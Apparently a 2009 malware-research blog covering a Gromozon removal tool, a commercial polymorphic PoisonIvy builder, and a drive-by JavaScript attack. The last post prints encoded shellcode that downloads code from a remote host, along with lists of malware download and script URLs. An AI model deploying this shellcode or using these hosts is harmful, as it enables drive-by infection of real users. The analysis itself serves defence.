The tool is quite fast in performing a preliminary check for Trojan.Gromozon rootkit component and allows the user to decide to proceed with the removal or to quit, as shown in SNAP 3.
SNAP 3 :
Once the user chooses to continue with the removal process, the next warning window comes up requesting the user to save all unsaved applications to continue with system rebook, as seen in SNAP 4.
SNAP 4 :
After the system has been rebooted, the scan begins [SNAP 5].
SNAP 5 :
Once the scanning and cleaning is complete, the scan details along with logging details are displayed to the user[SNAP 6].
SNAP 6 :
Log lets generated as shown in the above snapshot in a file named "gromozon_removal.log". Since we did not have any event triggered, and since no hidden files were found, there was nothing really to show a snapshot.
If you wish to participate in this project in a dedicated fashion or in any other projects, kindly email us at contact.fingers @ gmail.com
- EF
Creating Online polymorphic malware based PoisonIvy
Joined the Internet today is also a hostile environment, when it's used taking into account the minimum and necessary precautions in terms of security, is used as a platform to commit various types of attacks and, as in this case, offer a variety "services", including the creation of malicious code.
This is the online version of PoisonIvy called Polymorphic PoisonIvy Builder Online, a trojan known within the world of malware that respects the classic creation of malicious code to create a trojan (server) that spreads to infect computers and then control those infected computers to through the client program.
However, this online version has an extra component that makes the result in a much more dangerous malware that created the conventional way of adding features polymorphic. This means that each binary set up by means of this automatic is different because it completely changes your code.
This feature seeks to evade detection by antivirus signatures and prolong their life cycle, implying that at least the AV detected more money generated by their creator.
This package is written in PHP/ASM and while the creation of malware is done online, isn't free, is marketed at a price of U$S 500. In the screenshot we can see its features:
This situation is merely another of the many shows that make it clear that malware is a business, an industry where more and more developers to join their ranks.
# Jorge Mieres
Saturday, February 7, 2009
Busy Weekend
- EF
Friday, February 6, 2009
Exploitation of vulnerabilities through JS
These methods, which are also combined with different strategies, they become a time bomb that detonates with the simple action of accessing a page maliciously manipulated to accommodate the strategies of attack.
Numerous cases, such as taking advantage of various weaknesses exploited through the archives .js, .swf, .pdf, .mp3, even pretending to be files .css, make clear that any type of file is free to be used as channel spread much less as a vector for infection.
In recent weeks, a wave file .js is being used to redirect the download of malicious code through obfuscated scripts that hide in the body of the JavaScript like the following that is hosted at URL http://www.710sese .cn/a1/realdadong. js in md5 hash which is d1094b907dfe99784b206d2ae9b1fe97:
var mybr = unescape("%u6090%u17eb%u645e%u30a1%u0000%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%
ue8e0%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u0870%uec81%u0200%u0000%uec8b
%ue8bb%u020f%u8b00%u8503%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d%u6856%ufe
98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1
%ub8e5%u95e8%u0000%u8900"+"%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900%u1045%u6856%ufcaa
%u7c0d%u79e8%u0000%u8900%u0845%u6856%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%
u8900%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00%u285d%uff53%u0455%u6850%u1a3
6%u702f%u3fe8%u0000%u8900%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e%uc778%u0
544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%
uc481%u0200%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b%u560c%u738b%u8b3c%u1
e74%u0378%u56f3%u768b%u0320%u33f3%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1%
u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u04
8b%u038b%u5ec5%u595b%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100%u0000%ua4f3%
uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u458
9%uc724%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574%uc748%u0c47%u6165%u0070%u
5057%u55ff%u8b08%ub8f0%u0fe4%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700%u55ff%
u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff5
6%u1055%u06c7%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b%u5324%u5251%u5756%uec
b9%u020f%u8b00%u8519%u75db%u3350%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e%
u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f%u8318%u6afb%u2575%uc083%u8b04%ub830
%u0fe0%u0002%u0068%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824%uecb9%u020f%uff0
0%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00%ue820%ufdda%uffff%u7468%u7074%u2f3a%u642f%u772e%u6965
%u6b78%u632e%u6d6f%u6e2f%u7765%u612f%u2e31%u7363%u0073");
Furthermore, between half of the entire process of infection, which lasts only a few seconds, connecting to the sites txt.hsdee .com and www.wdswe .com, where, since the former makes a Drive-by Update on file oo.txt for when responds with an 200 "OK", download the binaries in the file. The first of them since http://www.wdswe .com/new/new1. exe (md5: 1c0b699171f985b1eab092bf83f2ad37).
The information is read from the text file is as follows:
[file]
open=y
url1=http://www.wdswe .com/new/new1 .exe
url2=http://www.wdswe .com/new/new2 .exe
url3=http://www.wdswe .com/new/new3 .exe
url4=http://www.wdswe .com/new/new4 .exe
url5=http://www.wdswe .com/new/new5 .exe
url6=http://www.wdswe .com/new/new6 .exe
url7=http://www.wdswe .com/new/new7 .exe
url8=http://www.wdswe .com/new/new8 .exe
url9=http://www.wdswe .com/new/new9 .exe
url10=http://www.wdswe .com/new/new10 .exe
url11=http://www.wdswe .com/new/new11 .exe
url12=http://www.wdswe .com/new/new12 .exe
url13=http://www.wdswe .com/new/new13 .exe
url14=http://www.wdswe .com/new/new14 .exe
url15=http://www.wdswe .com/new/new15 .exe
url16=http://www1.wdswe .com/new/new16 .exe
url17=http://www1.wdswe .com/new/new17 .exe
url18=http://www1.wdswe .com/new/new18 .exe
url19=http://www1.wdswe .com/new/new19 .exe
url20=http://www1.wdswe .com/new/new20 .exe
url21=http://www1.wdswe .com/new/new21 .exe
url22=http://www1.wdswe .com/new/new22 .exe
url23=http://www1.wdswe .com/new/new23 .exe
url24=http://www1.wdswe .com/new/new24 .exe
url25=http://www1.wdswe .com/new/new25 .exe
url26=http://www1.wdswe .com/new/new26 .exe
url27=http://www1.wdswe .com/new/new27 .exe
url28=http://www1.wdswe .com/new/new28 .exe
count=28
Some other URL's used to spread malware in the same way are:
http://97.haowyt .com/js/baidu .js
http://97.haowyt .com/js/baidu .js
http://www.163wyt .com/js/yahoo .js
http://www.710sese .cn/a1/hohogl .js
http://www.710sese .cn/a1/wokaono .js
http://www.710sese .cn/a1/woriniss .js
http://qq.18i16 .net/lzz .js
http://qq.18i16 .net/bf .js
http://qq.18i16 .net/realplay .js
http://qq.18i16 .net/new .js
http://qq.18i16 .net/cx .js
http://www.baomaaa .cn/a1/realdadong .jshttp://www.baomaaa .cn/a1/hohogl .js
http://www.baomaaa .cn/a1/wokaono .js
http://www.baomaaa .cn/a1/woriniss .js
http://tj.gan7788 .com/js/js .js
http://sss.2010wyt .net/r .js
http://sss.2010wyt .net/614 .js
Despite the job by the creators of malware, advanced techniques of infection, there is an element that can avoid becoming victims of similar attacks focused purely on keeping updates completely up to date, including applications.
# Jorge Mieres